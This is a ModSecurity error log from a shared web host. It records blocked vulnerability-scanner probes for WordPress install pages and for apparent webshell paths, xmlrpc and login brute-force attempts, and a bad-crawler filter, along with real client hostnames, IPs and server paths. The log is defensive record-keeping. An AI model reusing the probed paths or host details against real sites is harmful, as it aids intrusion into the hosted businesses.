[Tue May 26 14:21:48.921092 2026] [security2:error] [pid 606909:tid 607125] [client 152.42.255.208:41246] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVfI10yRtX9qA7aVUVURwAAANs"], referer: https://staging.unsobered.com/
[Tue May 26 14:21:49.121656 2026] [security2:error] [pid 606909:tid 607113] [client 4.201.75.230:5456] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/abcd.php"] [unique_id "ahVfJV0yRtX9qA7aVUVUZAAAAM8"]
[Tue May 26 14:21:49.644805 2026] [autoindex:error] [pid 606909:tid 607117] [client 54.205.63.235:61309] AH01276: Cannot serve directory /home2/ushapjsg/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:21:49.807061 2026] [security2:error] [pid 606909:tid 607114] [client 54.205.63.235:61309] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ushaprec.com"] [uri "/wp-admin/setup-config.php"] [unique_id "ahVfJV0yRtX9qA7aVUVUbQAAANA"]
[Tue May 26 14:21:49.818213 2026] [security2:error] [pid 606909:tid 607078] [client 54.205.63.235:61583] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ushaprec.com"] [uri "/old/wp-admin/install.php"] [unique_id "ahVfJV0yRtX9qA7aVUVUcQAAAKw"]
[Tue May 26 14:21:49.818351 2026] [security2:error] [pid 606909:tid 607109] [client 54.205.63.235:61584] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ushaprec.com"] [uri "/staging/wp-admin/install.php"] [unique_id "ahVfJV0yRtX9qA7aVUVUcwAAAMs"]
[Tue May 26 14:21:49.818539 2026] [security2:error] [pid 606909:tid 607165] [client 54.205.63.235:61575] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ushaprec.com"] [uri "/wordpress/wp-admin/setup-config.php"] [unique_id "ahVfJV0yRtX9qA7aVUVUdgAAAQM"]
[Tue May 26 14:21:49.818618 2026] [security2:error] [pid 606909:tid 607096] [client 54.205.63.235:61577] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ushaprec.com"] [uri "/wp/wp-admin/setup-config.php"] [unique_id "ahVfJV0yRtX9qA7aVUVUcgAAAL4"]
[Tue May 26 14:21:49.818761 2026] [security2:error] [pid 606909:tid 607068] [client 54.205.63.235:61576] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ushaprec.com"] [uri "/old/wp-admin/setup-config.php"] [unique_id "ahVfJV0yRtX9qA7aVUVUdAAAAKI"]
[Tue May 26 14:21:49.818836 2026] [security2:error] [pid 606909:tid 607074] [client 54.205.63.235:61581] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ushaprec.com"] [uri "/wp-admin/install.php"] [unique_id "ahVfJV0yRtX9qA7aVUVUeAAAAKg"]
[Tue May 26 14:21:49.818895 2026] [security2:error] [pid 606909:tid 607099] [client 54.205.63.235:61580] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ushaprec.com"] [uri "/backup/wp-admin/setup-config.php"] [unique_id "ahVfJV0yRtX9qA7aVUVUdQAAAME"]
[Tue May 26 14:21:49.818953 2026] [security2:error] [pid 606909:tid 607133] [client 54.205.63.235:61578] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ushaprec.com"] [uri "/wordpress1/wp-admin/setup-config.php"] [unique_id "ahVfJV0yRtX9qA7aVUVUegAAAOM"]
[Tue May 26 14:21:49.819001 2026] [security2:error] [pid 606909:tid 607122] [client 54.205.63.235:61579] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ushaprec.com"] [uri "/staging/wp-admin/setup-config.php"] [unique_id "ahVfJV0yRtX9qA7aVUVUdwAAANg"]
[Tue May 26 14:21:49.819051 2026] [security2:error] [pid 606909:tid 607047] [client 54.205.63.235:61582] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ushaprec.com"] [uri "/wordpress/wp-admin/install.php"] [unique_id "ahVfJV0yRtX9qA7aVUVUeQAAAI0"]
[Tue May 26 14:21:49.819552 2026] [security2:error] [pid 606909:tid 607104] [client 54.205.63.235:61586] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ushaprec.com"] [uri "/wp/wp-admin/install.php"] [unique_id "ahVfJV0yRtX9qA7aVUVUfAAAAMY"]
[Tue May 26 14:21:49.819586 2026] [security2:error] [pid 606909:tid 607096] [client 54.205.63.235:61585] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ushaprec.com"] [uri "/wordpress1/wp-admin/install.php"] [unique_id "ahVfJV0yRtX9qA7aVUVUewAAAL4"]
[Tue May 26 14:21:49.819609 2026] [security2:error] [pid 606909:tid 607040] [client 54.205.63.235:61588] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ushaprec.com"] [uri "/demo/wp-admin/install.php"] [unique_id "ahVfJV0yRtX9qA7aVUVUfQAAAIY"]
[Tue May 26 14:21:49.819697 2026] [security2:error] [pid 606909:tid 607064] [client 54.205.63.235:61587] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ushaprec.com"] [uri "/backup/wp-admin/install.php"] [unique_id "ahVfJV0yRtX9qA7aVUVUfgAAAJ4"]
[Tue May 26 14:21:50.019587 2026] [security2:error] [pid 606909:tid 607082] [client 54.205.63.235:61844] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ushaprec.com"] [uri "/test/wp-admin/install.php"] [unique_id "ahVfJl0yRtX9qA7aVUVUhwAAALA"]
[Tue May 26 14:21:50.061479 2026] [security2:error] [pid 606909:tid 607119] [client 152.42.255.208:41256] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVfJV0yRtX9qA7aVUVUhgAAANU"], referer: https://staging.unsobered.com/
[Tue May 26 14:21:50.288682 2026] [security2:error] [pid 606909:tid 607134] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfJV0yRtX9qA7aVUVUhAAAAOQ"]
[Tue May 26 14:21:51.937688 2026] [security2:error] [pid 606909:tid 607052] [client 4.201.75.230:5455] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/as.php"] [unique_id "ahVfJ10yRtX9qA7aVUVUtwAAAJI"]
[Tue May 26 14:21:52.720966 2026] [security2:error] [pid 606909:tid 607044] [client 192.178.8.100:35599] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 100.8.178.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahVfKF0yRtX9qA7aVUVUzQAAAIo"]
[Tue May 26 14:21:52.766349 2026] [security2:error] [pid 606909:tid 607115] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVfKF0yRtX9qA7aVUVU0AAAANE"], referer: https://www.anujtradingco.com/
[Tue May 26 14:21:52.838012 2026] [security2:error] [pid 606909:tid 607120] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfKF0yRtX9qA7aVUVUwgAAANY"]
[Tue May 26 14:21:52.983652 2026] [security2:error] [pid 606909:tid 607067] [client 192.178.8.100:51903] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 100.8.178.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahVfKF0yRtX9qA7aVUVU2gAAAKE"]
[Tue May 26 14:21:53.513576 2026] [security2:error] [pid 606909:tid 607095] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVfKV0yRtX9qA7aVUVU7AAAAL0"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1285318&moderation-hash=ebe2c4156d943d51100e8ea3501d2963
[Tue May 26 14:21:54.250129 2026] [security2:error] [pid 606909:tid 607092] [client 4.201.75.230:5458] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/wp-trackback.php"] [unique_id "ahVfKl0yRtX9qA7aVUVVBQAAALo"]
[Tue May 26 14:21:54.918702 2026] [security2:error] [pid 606909:tid 607108] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfKl0yRtX9qA7aVUVVFgAAAMo"]
[Tue May 26 14:21:55.296450 2026] [security2:error] [pid 606909:tid 607053] [client 49.206.61.138:35331] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVfK10yRtX9qA7aVUVVJgAAAJM"], referer: https://staging.unsobered.com/
[Tue May 26 14:21:55.757435 2026] [security2:error] [pid 606909:tid 607085] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVfK10yRtX9qA7aVUVVOwAAALM"], referer: https://anujtradingco.com
[Tue May 26 14:21:55.878864 2026] [security2:error] [pid 606909:tid 607135] [client 47.128.45.33:52286] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "moes-art.com"] [uri "/blog/"] [unique_id "ahVfK10yRtX9qA7aVUVVQgAAAOU"]
[Tue May 26 14:21:56.947039 2026] [security2:error] [pid 606909:tid 606933] [remote 82.196.25.136:39428] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 136.25.196.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "theafterglow-centre.com"] [uri "/wp-login.php"] [unique_id "ahVfLF0yRtX9qA7aVUVVZgAA6Bc"]
[Tue May 26 14:21:57.105882 2026] [security2:error] [pid 606909:tid 607054] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfLF0yRtX9qA7aVUVVZQAAAJQ"]
[Tue May 26 14:21:57.356436 2026] [security2:error] [pid 606909:tid 607113] [client 202.141.83.254:5639] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVfLV0yRtX9qA7aVUVVdgAAAM8"]
[Tue May 26 14:21:57.356591 2026] [security2:error] [pid 606909:tid 607113] [client 202.141.83.254:5639] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVfLV0yRtX9qA7aVUVVdgAAAM8"]
[Tue May 26 14:21:58.982493 2026] [security2:error] [pid 606909:tid 607155] [client 202.141.30.10:35382] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVfLl0yRtX9qA7aVUVVqwAAAPk"]
[Tue May 26 14:21:58.984001 2026] [security2:error] [pid 606909:tid 607155] [client 202.141.30.10:35382] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVfLl0yRtX9qA7aVUVVqwAAAPk"]
[Tue May 26 14:21:59.257733 2026] [security2:error] [pid 606909:tid 607138] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfLl0yRtX9qA7aVUVVpQAAAOg"]
[Tue May 26 14:21:59.674716 2026] [security2:error] [pid 606909:tid 607040] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVfL10yRtX9qA7aVUVVvQAAAIY"], referer: https://www.anujtradingco.com/
[Tue May 26 14:22:00.421739 2026] [security2:error] [pid 606909:tid 607059] [client 185.191.171.12:22846] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-3-7/list/"] [unique_id "ahVfMF0yRtX9qA7aVUVV2AAAAJk"]
[Tue May 26 14:22:00.421835 2026] [security2:error] [pid 606909:tid 607059] [client 185.191.171.12:22846] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-3-7/list/"] [unique_id "ahVfMF0yRtX9qA7aVUVV2AAAAJk"]
[Tue May 26 14:22:00.426211 2026] [security2:error] [pid 606909:tid 607075] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVfMF0yRtX9qA7aVUVV1wAAAKk"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1285277&moderation-hash=4e0d83967d61716d2f3f85439cb6c2c2
[Tue May 26 14:22:00.955092 2026] [security2:error] [pid 606909:tid 607073] [client 122.172.83.108:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVfL10yRtX9qA7aVUVVywAAp0k"], referer: https://kingsclub.in/membership-club-in-bangalore/
[Tue May 26 14:22:01.316319 2026] [security2:error] [pid 606909:tid 607117] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfMF0yRtX9qA7aVUVV6AAAANM"]
[Tue May 26 14:22:01.428243 2026] [security2:error] [pid 606909:tid 607136] [client 172.98.32.45:57845] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.32.98.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVfMV0yRtX9qA7aVUVV7AAAAOY"]
[Tue May 26 14:22:01.758958 2026] [security2:error] [pid 606909:tid 607057] [client 49.205.177.10:58637] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVfMV0yRtX9qA7aVUVV_AAAAJc"], referer: https://staging.unsobered.com/
[Tue May 26 14:22:02.690219 2026] [security2:error] [pid 606909:tid 607045] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfMl0yRtX9qA7aVUVWCgAAAIs"]
[Tue May 26 14:22:04.505301 2026] [security2:error] [pid 606909:tid 607158] [client 27.61.232.142:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfNF0yRtX9qA7aVUVWPAAAAPw"]
[Tue May 26 14:22:04.746630 2026] [security2:error] [pid 606909:tid 606951] [remote 165.22.95.96:60492] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 96.95.22.165.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahVfNF0yRtX9qA7aVUVWRQAAuCk"]
[Tue May 26 14:22:05.757644 2026] [security2:error] [pid 606909:tid 607156] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfNV0yRtX9qA7aVUVWXAAAAPo"]
[Tue May 26 14:22:06.972371 2026] [security2:error] [pid 606909:tid 607115] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfNl0yRtX9qA7aVUVWhAAAANE"]
[Tue May 26 14:22:07.620171 2026] [security2:error] [pid 606909:tid 607051] [client 202.141.83.254:5698] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVfN10yRtX9qA7aVUVWmwAAAJE"]
[Tue May 26 14:22:07.620296 2026] [security2:error] [pid 606909:tid 607051] [client 202.141.83.254:5698] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVfN10yRtX9qA7aVUVWmwAAAJE"]
[Tue May 26 14:22:07.697007 2026] [security2:error] [pid 606909:tid 607053] [client 4.201.75.230:5477] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dhmwayanad.in.svijaykumar.in"] [uri "/about.php"] [unique_id "ahVfN10yRtX9qA7aVUVWnwAAAJM"]
[Tue May 26 14:22:08.952899 2026] [security2:error] [pid 606909:tid 607092] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfOF0yRtX9qA7aVUVWtgAAALo"]
[Tue May 26 14:22:09.596507 2026] [security2:error] [pid 606909:tid 607010] [remote 5.78.119.122:50250] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 122.119.78.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahVfOV0yRtX9qA7aVUVW0QAAm2Q"]
[Tue May 26 14:22:09.895024 2026] [security2:error] [pid 606909:tid 607126] [client 202.141.30.10:35516] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVfOV0yRtX9qA7aVUVW2gAAANw"]
[Tue May 26 14:22:09.895186 2026] [security2:error] [pid 606909:tid 607126] [client 202.141.30.10:35516] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVfOV0yRtX9qA7aVUVW2gAAANw"]
[Tue May 26 14:22:11.681446 2026] [security2:error] [pid 606909:tid 607143] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVfO10yRtX9qA7aVUVXCgAAAO0"]
[Tue May 26 14:22:11.880925 2026] [security2:error] [pid 606909:tid 607118] [client 20.206.67.134:3384] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVfO10yRtX9qA7aVUVXHwAAANQ"], referer: www.google.com
